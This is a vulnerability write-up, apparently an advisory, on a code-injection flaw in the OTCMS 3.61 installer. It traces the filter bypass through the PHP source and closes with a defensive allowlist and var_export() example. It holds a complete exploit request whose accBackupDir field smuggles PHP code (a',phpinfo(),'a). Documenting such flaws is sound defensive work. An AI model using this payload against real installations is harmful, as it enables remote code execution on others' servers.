OTCMS 3.61 Command Execution
Description
OTCMS 3.61 contains a code execution vulnerability in its installer. Affected parameter: accBackupDir=a',phpinfo(),'a
Request Packet:
POST /OTCMS_PHP_V3.61_20180806/install/index.php?mudi=run HTTP/1.1
Host: 192.168.159.148
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.148/OTCMS_PHP_V3.61_20180806/install/index.php?mudi=config
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cookie: qshZy_userID=1; qshZy_username=ss123; qshZy_userInfo=AjsBD10hD39QMA9uWGoCDlNmUTRZZVY1UmIEMAcxCzgDMw44DDYBOlUxBWRbaAI1VzBQM1FrAGBRNFFkVGVROAJvATJdZg9uUGQPOFhsAjZTDFEPWQhWZlIvBDIHfgsw; qshZy_usercall=ssssss; PHPSESSID=mubrngtpmvp2dvpuaoe7pkfgb0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
adminName=admin&adminPwd=admin&adminDir=admin&dbType=mysql&accName=&accDir=&sqlIp=localhost&sqlPo=3306&sqlUsername=root&sqlUserPwd=123.a&sqlDbName=OTCMS&sqlPref=OT_&isImport=2&mysqlState=1&accBackupDir=a',phpinfo(),'a
Then visit the homepage:
http://192.168.159.148/OTCMS_PHP_V3.61_20180806/
Code analysis
index.php
Line 83: executes run()
case 'run':
WebTop();
run();
WebBottom();
break;
Line 862: run()
function run(){
global $DB,$dbServerName,$dbName;
$adminName = OT::PostStr('adminName');
$adminPwd = OT::PostStr('adminPwd');
$adminDir = OT::PostRegExpStr('adminDir','fileName');
$isSkipChk = OT::PostInt('isSkipChk');
$dbType = OT::PostStr('dbType');
$accDir = OT::PostRegExpStr('accDir','fileName');
$accName = OT::PostRegExpStr('accName','fileName');
$sqlIp = OT::PostStr('sqlIp');
$sqlPo = OT::PostInt('sqlPo');
$sqlUsername = OT::PostStr('sqlUsername');
$sqlUserPwd = OT::PostStr('sqlUserPwd');
$sqlDbName = OT::PostStr('sqlDbName');
$sqlPref = OT::PostStr('sqlPref');
$isImport = OT::PostInt('isImport');
$isMysqlClass = OT::PostInt('isMysqlClass');
$accBackupDir = OT::PostRegExpStr('accBackupDir','fileName'); // only the 'fileName' character blacklist shown below is applied
OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classOT.php, line 55:
public static function PostRegExpStr($str,$repType){
return Str::RegExp(@$_POST[$str],$repType);
}
OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classStr.php, line 276:
case 'fileName':
$pattern = "/(\\\\|\\/|\\:|\\*|\\?|\\\"|<|>|\|)/i";
return preg_replace($pattern,'',$str);
break;
The 'fileName' pattern only strips the characters \ / : * ? " < > |, so single quotes, commas and parentheses pass through untouched and the value a',phpinfo(),'a reaches run() unchanged, bypassing the filter.
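As an added example (not OTCMS code), the blacklist quoted above placed beside an allowlist check and a var_export()-based config writer; it assumes, as the quote-breakout shape of the payload suggests, that the value is eventually interpolated into a generated PHP file, and the allowlist policy (letters, digits, '_', '-') is an assumed choice:

```php
<?php
// Added example, not code from OTCMS. Contrasts the page's 'fileName'
// blacklist with an allowlist check and a safe way to emit config values.

// Blacklist as quoted from classStr.php line 276: strips \ / : * ? " < > |
function filterBlacklist(string $str): string {
    $pattern = "/(\\\\|\\/|\\:|\\*|\\?|\\\"|<|>|\|)/i";
    return preg_replace($pattern, '', $str);
}

// Allowlist (assumed policy): a backup directory name may only contain
// letters, digits, '_' and '-', at most 64 characters. Anything else is
// rejected outright instead of being "cleaned".
function filterAllowlist(string $str): ?string {
    return preg_match('/^[A-Za-z0-9_-]{1,64}$/', $str) === 1 ? $str : null;
}

// When a value must be written into a PHP config file, let var_export()
// produce the literal: it escapes ' and \ itself, so a quote in the input
// cannot terminate the string and become code.
function configLine(string $name, string $value): string {
    return '$' . $name . ' = ' . var_export($value, true) . ';';
}

$payload = "a',phpinfo(),'a";   // the accBackupDir value from the request above
$benign  = "backup_2018";       // constructed sample of a legitimate value

// The blacklist leaves the payload intact; the allowlist returns null for it
// (the installer should abort here) and passes the benign name through.
echo "blacklist : ", filterBlacklist($payload), "\n";
echo "allowlist : ", var_export(filterAllowlist($payload), true), "\n";
echo "allowlist : ", var_export(filterAllowlist($benign), true), "\n";

// Even if a raw value reached the config writer, var_export() keeps it a string.
echo configLine('accBackupDir', $payload), "\n";
echo configLine('accBackupDir', $benign), "\n";
```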